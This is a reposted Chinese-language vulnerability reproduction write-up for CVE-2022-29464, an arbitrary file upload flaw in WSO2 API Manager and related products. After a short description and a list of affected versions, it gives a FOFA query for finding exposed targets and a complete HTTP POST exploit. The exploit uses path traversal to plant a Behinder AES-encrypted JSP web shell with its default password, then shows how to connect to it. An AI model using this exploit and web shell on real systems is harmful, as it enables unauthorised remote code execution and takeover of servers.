-CVE-2022-29464-WSO2 任意文件上传漏洞

本文转载于公众号：融云攻防实验室，原文地址：

漏洞复现-CVE-2022-29464-WSO2 任意文件上传漏洞

0x01 阅读须知

0x02 漏洞描述

WSO2APIManager是一款可以旨在提供优秀的API管理功能的开源产品，能够实现API的创建、发布、生命周期管理、流量控制、版本控制、治理和安全控制等功能。已用于WSO2EnterpriseServiceBus、WSO2IdentityServer和WSO2GovernanceRegistry等产品中。WSO2APIManager可以为开发团队提供Web页面进行部署、管理和监控API，服务消费者可以进行服务发现、服务订阅以及服务调用。APIM的KeyManager组件默认通信协议是ApacheThrift，另外，APIM可以通过集成WSO2Analytic平台实现API调用监控及告警。融云安全监测到WSO2 API Manager中存在任意文件上传和远程代码执行漏洞。该漏洞源于某些 WSO2 产品中对用户输入的验证不当，攻击者可以将任意文件上传到服务器的任意位置。通过利用任意文件上传漏洞，可以进一步在服务器上实现远程代码执行。

0x03 漏洞复现

漏洞影响:

• WSO2 API Manager 2.2.0 and above
• WSO2 Identity Server 5.2.0 and above
• WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, 5.6.0
• WSO2 Identity Server as Key Manager 5.3.0 and above
• WSO2 Enterprise Integrator 6.2.0 and above

FOFA:body=”WSO2 API MANAGER”

1.构造poc上传冰蝎马2.jsp，返回200上传成功

POST /fileupload/toolsAny HTTP/1.1
Host: x.x.x.x:23843
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 900
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0

--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name=\"../../../../repository/deployment/server/webapps/authenticationendpoint/2.jsp\"; filename=\"../../../../repository/deployment/server/webapps/authenticationendpoint/2.jsp\"

<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
--4ef9f369a86bfaadf5ec3177278d49c0--

2.冰蝎连接，得到一个shell

https://x.x.x.x:23843/authenticationendpoint/2.jsp #路径，默认密码为rebeyond